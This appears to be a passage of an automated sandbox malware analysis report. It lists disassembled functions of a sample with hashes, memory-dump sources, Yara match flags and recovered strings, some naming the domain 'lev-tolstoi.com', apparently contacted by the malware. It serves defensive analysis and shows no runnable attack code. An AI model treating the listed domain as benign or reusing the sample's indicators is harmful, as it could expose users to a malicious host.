                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID: D$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 3861434553-4021809485
                                                                                                                                                                                                                                                          • Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                                                                                                                                                                                          • Instruction ID: db83cc6d0157fc327276ba6685622738ae1c34c2f9734926ad1cda59646cf540
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8BA110B55083928FD335CF2584A07EBBBE1AFD6300F0889ADD0D95B392D775490ACB96
                                                                                                                                                                                                                                                          Function 0040E59D Relevance: 4.8, APIs: 1, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Uninitialize
                                                                                                                                                                                                                                                          • String ID: D$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 3861434553-4021809485
                                                                                                                                                                                                                                                          • Opcode ID: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
                                                                                                                                                                                                                                                          • Instruction ID: 22ccddc28fc708269306c978beef408f1ed5ca82190ea807a368fb49a74d3678
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a2b36ded3d63c48934e883b06f9b4d8cc45036b94076ba770b07ddeb3608e72
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5BA1F17550C3928BD739CF268450BEBBBE2AFE2300F18896DD0D55B392D7790906CB96
                                                                                                                                                                                                                                                          Function 0041542D Relevance: 4.2, Strings: 3, Instructions: 445COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: M99$M99${
                                                                                                                                                                                                                                                          • API String ID: 0-726366120
                                                                                                                                                                                                                                                          • Opcode ID: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
                                                                                                                                                                                                                                                          • Instruction ID: f63e886754d2f8b0a4918178e697645c79cb63f24128d1e0e3a60bf90f675cf0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d7211f4c4637cd8ba74eb749a251204111377ab38b478c7b2f32186a7a574d9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 76E1F675208381CBD724CF28D8957EBBBE2EFD5304F18886DE4D987292D7389846CB56
                                                                                                                                                                                                                                                          Function 00428889 Relevance: 4.1, Strings: 3, Instructions: 378COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: LoWf$dUgS$y}zN
                                                                                                                                                                                                                                                          • API String ID: 0-3353942304
                                                                                                                                                                                                                                                          • Opcode ID: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
                                                                                                                                                                                                                                                          • Instruction ID: 9afdd42b56ae40ab4dd5e281407d5461c0fd8baedc768c94432ec64788af82fb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c56ece68d25b053fc45e7bbabff213bb9af3a884a6344b36a553f0283c3d2f6e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 60E13775609391CFD714CF28E8A071EBBE2FF8A314F45866DE4955B3A2C7349940CB4A
                                                                                                                                                                                                                                                          Function 004292D1 Relevance: 4.1, Strings: 3, Instructions: 310COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: R@$YZ$ABC
                                                                                                                                                                                                                                                          • API String ID: 0-1595031515
                                                                                                                                                                                                                                                          • Opcode ID: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
                                                                                                                                                                                                                                                          • Instruction ID: 270e1ec567564e7ac11abac967337e8e2186c96c465a8b5db0c3d0d17cb18083
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dfd9caee6b709295c13799ae250536b88b24724ec0ea3151b9be87810baffe9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5A1DF76A083618FD324CF28D85175BB7E2FFC5300F05882DE4898B381E7789906CB96
                                                                                                                                                                                                                                                          Function 02496937 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ^D$iM$tz
                                                                                                                                                                                                                                                          • API String ID: 0-1308588582
                                                                                                                                                                                                                                                          • Opcode ID: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
                                                                                                                                                                                                                                                          • Instruction ID: e56e7d02d3a5d33b8834308afa178411130289b18f56fe60d9f05005faf0ba04
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e13069b4e80495524c3989dd50d5f3b67c32311433174fed63dae222ed4aa9da
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1812AB26083618BC724DF69C89165BBBF1EF85314F098A2DE8C54B750F3759805C7C2
                                                                                                                                                                                                                                                          Function 004266D0 Relevance: 4.0, Strings: 3, Instructions: 283COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ^D$iM$tz
                                                                                                                                                                                                                                                          • API String ID: 0-1308588582
                                                                                                                                                                                                                                                          • Opcode ID: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
                                                                                                                                                                                                                                                          • Instruction ID: 86ebe705a78406a5c1a3aac74b58c8bc8eea1bff25a69ee308d07cbdd2d3a250
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4fccb09ca02ca265e5a2ee1d5ec9f6955df610e162b9df98781e2be2e9d3637
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86813A72A083618BC324DF69D89125BB7F1EFD5318F098A2CE8C59B350E7799805CBC6
                                                                                                                                                                                                                                                          Function 00419BFF Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _q0s$gfff$o~A
                                                                                                                                                                                                                                                          • API String ID: 0-1380180136
                                                                                                                                                                                                                                                          • Opcode ID: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction ID: 9ac1f0c1fc7a49e8154fcc72e3c80d4cb5b55f6ce251fccbb0b8a1824a22e975
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bbe2847cc035eb94d765ed87b187a5de19f998dd8160d28f4ca51f335dabcf03
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E71B2726093508BC724DF25C8622EB77E2FFD5364F188A2DD8998B395E7388941C786
                                                                                                                                                                                                                                                          Function 0247092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                                          • API String ID: 0-2784972518
                                                                                                                                                                                                                                                          • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                          • Instruction ID: 2ba03358afb4aa586080315134d9a6fa806d0697afe7ce4ec3d947c4ea805d1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AB3147B6911609DFDB10CF99C880AEEBBF9FF48324F15504AD851A7310D771EA45CBA4
                                                                                                                                                                                                                                                          Function 02474EC7 Relevance: 3.3, Strings: 2, Instructions: 819COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                          • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction ID: 6b6bb63bf8fd97176c83fd8f48d4d9708842aa01a65373b32ff33e7f12d62bc2
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F87259716093409FD714CF28C890BAFBBE2AF85314F44892EF9998B391D375D949CB92
                                                                                                                                                                                                                                                          Function 00404C60 Relevance: 3.3, Strings: 2, Instructions: 819COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 0$8
                                                                                                                                                                                                                                                          • API String ID: 0-46163386
                                                                                                                                                                                                                                                          • Opcode ID: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction ID: b632590525e39ce5a857bdb2105f3f6bf93eafba229eb97f7c3f587b0413ca56
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd3430a49e53e44d2c1b800aecf7f30112ca0deec01d32340aaa44e71317447b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B17245716083409FDB14CF18C884BABBBE1EF84314F04892EF9899B391D779D949CB96
                                                                                                                                                                                                                                                          Function 024A03C8 Relevance: 3.1, APIs: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2610073882-0
                                                                                                                                                                                                                                                          • Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                                                                                                                                                                                          • Instruction ID: 61ed2ecb68e94ba3c35387a57d924bca211ee6f06d97705f1474165f870bc901
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E516E61608FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762
                                                                                                                                                                                                                                                          Function 00430161 Relevance: 3.1, APIs: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2610073882-0
                                                                                                                                                                                                                                                          • Opcode ID: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                                                                                                                                                                                          • Instruction ID: 6ba9ae55c9c609b8c98ae8d3013d17b988d2f3c8137f657ab236dd5297d85bd1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c25163ce398a7b029c4444921b319866883930bdaffdc4c83f29d4f0e634296
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7515D61208FC18ED321CB388848387BFD26B67214F498A9CD1FE8B3D6DB756549C762
                                                                                                                                                                                                                                                          Function 0247C8A3 Relevance: 3.1, Strings: 2, Instructions: 602COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: ^_$lev-tolstoi.com
                                                                                                                                                                                                                                                          • API String ID: 0-1855683627
                                                                                                                                                                                                                                                          • Opcode ID: 1664598b216d497c2916ea9ab733d11f603640bddf945b819b2674d3a3824a92
                                                                                                                                                                                                                                                          • Instruction ID: 4fd6625e6300d326ee2cc3af1c309e82f6d73bb87a0c79d33638379d72403eca
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1664598b216d497c2916ea9ab733d11f603640bddf945b819b2674d3a3824a92
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5802EFB158E3D28AD734CF259490BEBBBE1EBD6304F08896DC4E90B712D735050ADB92
                                                                                                                                                                                                                                                          Function 0249DDE1 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _$uHHs
                                                                                                                                                                                                                                                          • API String ID: 0-2879388440
                                                                                                                                                                                                                                                          • Opcode ID: 69151789f7b3256d51734eb4590231589fed63b8bb5089053cf3f8cf0d9da1b8
                                                                                                                                                                                                                                                          • Instruction ID: 34b1a51fd2a745c93027e324416257d01a5b6bc625376a0b1fae8607bc751de9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69151789f7b3256d51734eb4590231589fed63b8bb5089053cf3f8cf0d9da1b8
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE1D6316183D08EDB35CB39C4917ABBFD19F97214F08496ED4D98B782D739850ACB52
                                                                                                                                                                                                                                                          Function 0042DB7A Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: _$uHHs
                                                                                                                                                                                                                                                          • API String ID: 0-2879388440
                                                                                                                                                                                                                                                          • Opcode ID: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                                                                                                                                                                                          • Instruction ID: 6fef95053ab342754befd2ad3e4f8b718065d38dd91b4b55b8e1a17b79ce2dd8
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fff4d2ae5a9090df37eee2bfda5c873a54dc35febac4667e5f7cefb26893c0c6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E4E127206183E08ED735CB3994917BBBBD1AFA7304F58896ED4D98B382C739850AC757
                                                                                                                                                                                                                                                          Function 02497537 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: I^]J$x[EH
                                                                                                                                                                                                                                                          • API String ID: 0-931091327
                                                                                                                                                                                                                                                          • Opcode ID: db551f8e797dcbae1c02e228865559abfbe54483d31dc6e61fea14308a51eaf6
                                                                                                                                                                                                                                                          • Instruction ID: cfbcd1d99bf457d36b2743817469aeb9e25497bbfac120f483c60a0b36b209a6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db551f8e797dcbae1c02e228865559abfbe54483d31dc6e61fea14308a51eaf6
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8EC145B2A283408FDB24DF18CC5167BFB92EF95314F09896EE9819B341E735E845C792
                                                                                                                                                                                                                                                          Function 004272D0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                          • String ID: I^]J$x[EH
                                                                                                                                                                                                                                                          • API String ID: 2994545307-931091327
                                                                                                                                                                                                                                                          • Opcode ID: e607c1285c3b2ef4515f96dc100574bf895752eac3d924a80b2de4dd1c907984
                                                                                                                                                                                                                                                          • Instruction ID: 0d59b06c8e91c5b12f8e4cbbc2a541ab03e5ca24646f09e67a505f6169a2a813
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e607c1285c3b2ef4515f96dc100574bf895752eac3d924a80b2de4dd1c907984
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34C16772B0C3208FD714DF18E84166BF792EF95314F99866EE8859B352E638EC05C396
                                                                                                                                                                                                                                                          Function 02474537 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                                                                                                                          • Opcode ID: 58bfa7e97d68a633eb0371e74400c6f18e5a3e8932f6dd8633fd1d6ce4a95b6d
                                                                                                                                                                                                                                                          • Instruction ID: 17cf006dbf16cf3f80027f749fc735b989d4b1cda9123ddbb5f3e7a080dbba92
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bfa7e97d68a633eb0371e74400c6f18e5a3e8932f6dd8633fd1d6ce4a95b6d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 82D1A1B19083449FD720CF28C845BABBBE5EF94304F14492EF9A99B381D375D949CB92
                                                                                                                                                                                                                                                          Function 004042D0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: )$IEND
                                                                                                                                                                                                                                                          • API String ID: 0-707183367
                                                                                                                                                                                                                                                          • Opcode ID: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                                                                                                                                                                                          • Instruction ID: 9e91746e592093abc6b78d22eaac013f7dd1cf175606ed20a1766aa15e76428f
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b6de2c190c02fbea61387cb34139e6b47e564e05f79e2f2ac439f578bf2f602
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03D1BFB1A083449FD710DF14D84575BBBE4ABD4308F14492EFA99AB3C2E379E904CB96
                                                                                                                                                                                                                                                          Function 024AF4E7 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: e>3@$i>3@
                                                                                                                                                                                                                                                          • API String ID: 0-675609054
                                                                                                                                                                                                                                                          • Opcode ID: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
                                                                                                                                                                                                                                                          • Instruction ID: 9b82f782cdf0538c1051068375ea51c287a2a5449ef268f96f4f9dc1f5ddf874
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4b823d5a739544e07909f0db0eb8d2352278b010a9f16c06b625cc5fc70a34e4
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9A12936A083119FC724DF18C8A092BB7E2FF98744F1A852DE9859B761D732EC55C781
                                                                                                                                                                                                                                                          Function 0043F280 Relevance: 2.8, Strings: 2, Instructions: 324COMMON
